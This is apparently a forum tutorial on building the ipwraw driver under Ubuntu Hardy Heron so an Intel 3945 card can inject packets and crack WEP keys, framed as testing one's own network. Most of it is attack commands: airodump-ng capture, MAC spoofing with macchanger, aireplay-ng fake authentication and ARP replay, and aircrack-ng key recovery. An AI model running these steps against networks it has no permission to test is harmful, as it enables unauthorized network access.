WEP Cracking under Hardy Heron using ipwraw driver
FIRST READ IT:
There is nothing inherently wrong with penetration testing your own networks, and it is not illegal to possess or use any of the tools in my tutorial.
Following the logic that some linux applications can be misused, and that they are made for linux, then linux can be misused. Of course, even though linux can be a powerful tool or a "weapon" in the hands of some, all linux discussion should not be removed simply because of the possibility of misuse.
Providing people with the tools and knowledge to understand their own networks is a crucial step in the road to having better security. If you don't understand a problem, you can't give a solution. The more that people know and understand how the WEP encryption scheme is broken, the better they can protect themselves by using WPA or another standard that is more secure.
Citing another one, which I cannot remember:
Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network's security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.
Your computer may become unstable and even have a hard-lock [that it seems to be related to injection speed, it is more prone to crash with 54M speed than 1M speed] (you will need to do a hard reset on your machine, I can tell you from my own experience while trying to do this). I recommend to take enough measures to safe-guard your data just in case you have to reinstall your OS, and PLEASE DO NOT TRY THIS AT PRODUCTION MACHINES.
Please note that I'm using the ipwraw, which now is deprecated since I was not able to find enough information on how to do packet injection under the new drivers.
A not so long trip... - Starting:
I am aware that there are many ways to accomplish WEP cracking, after you can perform injection, such as kismet, and others, but this is the way it worked for me since Gutsy Gibbon, but now I have managed to make it work for Hardy Heron.
One main issue since the shipping of Intel PRO/Wireless 3945ABG WLAN (802.11a/b/g) was to make it even work with Linux. One effort (now deprecated) was the project hosted at http://ipw3945.sourceforge.net/ in which they offered a driver that in order to use you needed a binary microcode, a binary user space regulatory daemon, the ieee80211 subsystem, a linux kernel >= 2.6.13, wireless extensions and tools and a module WPA supplicant [this will not be covered in this walk-trough].
Now that effort have been deprecated in favour of the iwlwifi drivers (you can read the history here: http://intellinuxwireless.org/?p=iwlwifi). As far as I am aware, they support the Intel PRO/Wireless 3945ABG WLAN (802.11a/b/g) out of the box.
There is always a but. In order to support packet injection, the problems arised. Some distros (wifiway, if my memory is not so bad), and some websites (seguridadwireless.com, if my memory is not that bad) showed us how to patch the drivers, those steps have been ported to almost any linux distro. With the binary drivers (ipw3945), and using the ipwraw hosted at http://homepages.tu-darmstadt.de/~p_larbig/wlan/ you were able to perform packet injection.
Well, if you used those drivers, [almost] all was OK. When I installed Ubuntu Hardy Heron, I was so happy that the ipw3945 have been gone and that the iwlwifi driver was on command now, until... I tried to test packet injection. No one thing worked. For almost a day or two (I cannot recall total time... ) I googled the WWW in order to find a possible solution. No luck, i just find nothing/nada [Did I have entered the correct google search terms? Perhaps]. I just stumbled with some useful pages, indeed. Some of them uncovered that puzzle a little, and finally I was enlightened... [just joking in the enlightenment part]. This is a not standard way... as you will see...
The issue covering this walk-through, is to make under Hardy Heron the Intel 3945 chipset do packet injection, using the ipwraw driver provided by p_larbig, on a Hardy Heron. I'm working on various assumptions:
- you have managed to patch ipw3945 drivers, previously
- you own a linux machine with Hardy Heron freshly installed, I have neither the time or will to test on an upgraded system
- you have managed to compile/install previous versions of the ipwraw driver
- you know how to use aircrack-ng
- you own a WEP (Weak Encryption Protocol, ) network
- you can use CLI (ahhhhhhhh, linux, your CLI, a powerful tool and a headache)
- the CAPITAL LETTERS in the cracking WEP key part act as placeholders for
- CHANNEL, the channel which will be sniffed/injected
- FILE, a file name
- ESSID, the access point name such as WEIRDNET, INFINITAS, DREAMRYCHE
- BSSID, the access point address
- MACADDRESS, your wifi mac address
- you are using it under your own risk
- you know what the hell are you doing
A not so long trip... - Hands on:
You will need to type (or copy-past on CLI) the following
The non standard way:
sudo apt-get install linux-headers-`uname -r` build-essential libssl-dev macchanger
tar -xjf ipwraw-ng*
sudo make install
sudo make install_ucode
echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw
sudo depmod -ae
open gedit, copy and paste the following
Save it under a wise name such as: wepcrackconf.sh or so and give it run permisision by issuing
echo "Please provide the wifi0 CHANNEL"
echo "Please provide the capture rate (best results with only 2)"
echo "Please provide the target BSSID"
ifconfig wifi0 down
chmod u+wrx /sys/class/net/wifi0/device/rate
echo $rate >/sys/class/net/wifi0/device/rate
echo $canal >/sys/class/net/wifi0/device/channel
echo $bssid >/sys/class/net/wifi0/device/bssid
ifconfig wifi0 up
echo "Configuration completed. Ready to do packet injection"
sudo chmod +x wepcrackconf.sh
sudo modprobe -r iwl3945
sudo modprobe ipwraw
open four terminals
sudo iwconfig wifi0 rate 1M
sudo airodump-ng wifi0
- channel, pick the channel you wish
- rate always 2
- bssid, taken from previous terminal
sudo airodump-ng -c CHANNEL -w FILE wifi0
sudo macchanger -s wifi0
sudo aireplay-ng -1 10 -e "ESSID" -a BSSID -h MACADDRESS wifi0
back on first terminal
sudo aireplay-ng -3 -b BSSID -h MACADDRESS wifi0
After you have gathered enough IV's stop command running with a Ctrl-C keystroke and issue
sudo aircrack-ng FILE.cap
A not so long trip... - Comments:
sudo modprobe -r ipwraw
sudo modprobe iwl3945
- the shell is now dash not bash, in the compiling part will complaint about it, but it seems to compile the ipwraw driver well
- sudo make install, under the installing part seems to be aware of the firmware status (patched?/not patched?)
- sudo make install_ucode, same as above
- In the non standard way make sure that the quotes are CLI quotes (straight quotes), not typographical ones
- In the non standard way I'm using the root powers to accomplish it. If you know another way to set the values, please let me know.
- On the cracking part, fourth terminal
- you probably get a message stating something as "20:45:20 wifi0 is on channel 13, but the AP uses channel 6", just reissue it
- gather at least 500,000 packets, to crack a WEP 64-bit Hex (This is no longer the case since the new ptw attack (which is built into aircrack-ng, and used by your instructions) These days, anything between 20,000 and 50,000 packets will have success cracking 128 bit wep!) <- Thanks Noahod
- you can change the MAC address just read the macchanger info or man page
A not so long trip... - Troubleshooting:
- echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw, seems not to be blacklisting ipwraw module, just check that are CLI quotes NOT typographical quotes, and issue the command again
- If you cannot connect (after issuing all the commands or after a hard resent), just disable the ipw drivers and restart
A not so long trip... - ACKs and references:
In no particular order
A not so long trip... - Misc:
English is not my mother tongue, please be gentle with some grammatical errors. PM me and I will correct them ASAP.
Based loosely on the XAsmodeanX tutorial (http://ubuntuforums.org/showthread.php?t=514723)
A not so long trip... - Updates
- There is a tool called wesside-ng which is in beta in the aircrack-ng suite. Performs all the operations required to crack a WEP key, but is quite IMHO unstable. It gave me 2 hard-locks in a row.
- If you fail to reduce the capture rate the computer may crash... hard-learned by myself